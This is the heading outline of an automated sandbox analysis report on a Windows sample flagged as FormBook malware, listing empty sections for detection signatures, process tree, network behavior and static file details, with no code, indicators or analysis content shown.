Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 9LjOeq9jnl

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers